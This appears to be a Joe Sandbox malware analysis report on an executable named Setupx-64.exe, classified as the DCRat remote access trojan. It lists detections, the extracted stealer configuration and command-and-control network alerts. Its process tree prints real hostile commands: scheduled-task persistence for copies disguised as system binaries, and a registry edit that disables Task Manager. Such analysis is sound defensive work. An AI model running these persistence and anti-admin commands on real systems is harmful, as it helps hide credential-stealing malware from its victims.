Edit tour

Windows Analysis Report
Setupx-64.exe

Overview

General Information

Sample name:	Setupx-64.exe
Analysis ID:	1663901
MD5:	40bbdf50224ee7835a301e7cebf510d8
SHA1:	04aa4f725cedfee798b11fa49fe048331f776d81
SHA256:	d8befd70003d111bb42cda71b9ccfccbdd39c84f8d57c0420ec123fa86177b42
Tags:	exeuser-FelloBoiYuuka
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected DCRat

Creates processes via WMI

Disable Task Manager(disabletaskmgr)

Disables the Windows task manager (taskmgr)

Joe Sandbox ML detected suspicious sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64

Setupx-64.exe (PID: 8180 cmdline: "C:\Users\user\Desktop\Setupx-64.exe" MD5: 40BBDF50224EE7835A301E7CEBF510D8)

wscript.exe (PID: 3576 cmdline: "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ComcontainerruntimeCrtNet\kFuzdYrWw7.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Blockruntime.exe (PID: 7588 cmdline: "C:\ComcontainerruntimeCrtNet\Blockruntime.exe" MD5: F2338409BEF7A5FF68A39BC9E4D1F824)

schtasks.exe (PID: 7832 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7928 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8004 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7972 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Recovery\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7980 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7948 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8024 cmdline: schtasks.exe /create /tn "RZctPlhC2XmeDKsE7vR" /sc MINUTE /mo 7 /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3040 cmdline: schtasks.exe /create /tn "RZctPlhC2XmeDKsE7v" /sc ONLOGON /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2648 cmdline: schtasks.exe /create /tn "RZctPlhC2XmeDKsE7vR" /sc MINUTE /mo 8 /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5268 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1016 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4372 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5944 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3796 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7740 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

upfc.exe (PID: 5068 cmdline: "C:\Program Files (x86)\google\Update\upfc.exe" MD5: F2338409BEF7A5FF68A39BC9E4D1F824)

reg.exe (PID: 1928 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

fontdrvhost.exe (PID: 6524 cmdline: C:\Recovery\fontdrvhost.exe MD5: F2338409BEF7A5FF68A39BC9E4D1F824)

fontdrvhost.exe (PID: 7840 cmdline: C:\Recovery\fontdrvhost.exe MD5: F2338409BEF7A5FF68A39BC9E4D1F824)

RZctPlhC2XmeDKsE7v.exe (PID: 7188 cmdline: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe MD5: F2338409BEF7A5FF68A39BC9E4D1F824)

RZctPlhC2XmeDKsE7v.exe (PID: 7256 cmdline: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe MD5: F2338409BEF7A5FF68A39BC9E4D1F824)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"L\":\"!\",\"M\":\">\",\"d\":\";\",\"C\":\"&\",\"6\":\"^\",\"i\":\",\",\"P\":\"|\",\"R\":\")\",\"Q\":\"~\",\"o\":\" \",\"A\":\"#\",\"X\":\"<\",\"9\":\"(\",\"W\":\"`\",\"y\":\"$\",\"G\":\"*\",\"J\":\"-\",\"0\":\"@\",\"B\":\"_\",\"k\":\".\",\"S\":\"%\"}", "PCRT": "{\"L\":\" \",\"T\":\"%\",\"x\":\"^\",\"J\":\"|\",\"F\":\"`\",\"W\":\"<\",\"X\":\"-\",\"0\":\"~\",\"n\":\"#\",\"N\":\"_\",\"B\":\"$\",\"Y\":\"(\",\"S\":\".\",\"a\":\">\",\"k\":\"*\",\"l\":\"&\",\"H\":\")\",\"R\":\"!\",\"U\":\"@\",\"5\":\";\",\"9\":\",\"}", "TAG": "", "MUTEX": "ZaUWITXGrfAGfL0yFHjd", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000004.00000002.1377650559.0000000012C0F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Blockruntime.exe PID: 7588	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: upfc.exe PID: 5068	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: upfc.exe PID: 5068	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: fontdrvhost.exe PID: 6524	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: fontdrvhost.exe PID: 7840	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RZctPlhC2XmeDKsE7v.exe PID: 7188	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RZctPlhC2XmeDKsE7v.exe PID: 7256	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 8 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ComcontainerruntimeCrtNet\Blockruntime.exe, ProcessId: 7588, TargetFilename: C:\Recovery\fontdrvhost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Setupx-64.exe", ParentImage: C:\Users\user\Desktop\Setupx-64.exe, ParentProcessId: 8180, ParentProcessName: Setupx-64.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe" , ProcessId: 3576, ProcessName: wscript.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ComcontainerruntimeCrtNet\Blockruntime.exe" , ParentImage: C:\ComcontainerruntimeCrtNet\Blockruntime.exe, ParentProcessId: 7588, ParentProcessName: Blockruntime.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /f, ProcessId: 5944, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-12T21:40:21.057743+0200	2034194	1	A Network Trojan was detected	192.168.2.5	49692	141.8.192.84	80	TCP

ETPRO MALWARE DCRat Initial Checkin Server Response M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-12T21:40:38.173347+0200	2850862	1	Malware Command and Control Activity Detected	141.8.192.84	80	192.168.2.5	49696	TCP
2025-04-12T21:42:09.544478+0200	2850862	1	Malware Command and Control Activity Detected	141.8.192.84	80	192.168.2.5	49728	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe	Avira: detection malicious, Label: VBS/Runner.VPA
Source: C:\Recovery\fontdrvhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000004.00000002.1377650559.0000000012C0F000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"L\":\"!\",\"M\":\">\",\"d\":\";\",\"C\":\"&\",\"6\":\"^\",\"i\":\",\",\"P\":\"|\",\"R\":\")\",\"Q\":\"~\",\"o\":\" \",\"A\":\"#\",\"X\":\"<\",\"9\":\"(\",\"W\":\"`\",\"y\":\"$\",\"G\":\"*\",\"J\":\"-\",\"0\":\"@\",\"B\":\"_\",\"k\":\".\",\"S\":\"%\"}", "PCRT": "{\"L\":\" \",\"T\":\"%\",\"x\":\"^\",\"J\":\"|\",\"F\":\"`\",\"W\":\"<\",\"X\":\"-\",\"0\":\"~\",\"n\":\"#\",\"N\":\"_\",\"B\":\"$\",\"Y\":\"(\",\"S\":\".\",\"a\":\">\",\"k\":\"*\",\"l\":\"&\",\"H\":\")\",\"R\":\"!\",\"U\":\"@\",\"5\":\";\",\"9\":\",\"}", "TAG": "", "MUTEX": "ZaUWITXGrfAGfL0yFHjd", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}

Multi AV Scanner detection for dropped file

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	ReversingLabs: Detection: 76%
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	ReversingLabs: Detection: 76%
Source: C:\Program Files (x86)\Google\Update\upfc.exe	ReversingLabs: Detection: 76%
Source: C:\Recovery\fontdrvhost.exe	ReversingLabs: Detection: 76%
Source: C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe	ReversingLabs: Detection: 76%
Source: C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe	ReversingLabs: Detection: 76%

Multi AV Scanner detection for submitted file

Source: Setupx-64.exe	Virustotal: Detection: 63%			Perma Link
Source: Setupx-64.exe	ReversingLabs: Detection: 66%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.8%

Source: Setupx-64.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Setupx-64.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: nC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: }C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: fC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.000000000618A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: yC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
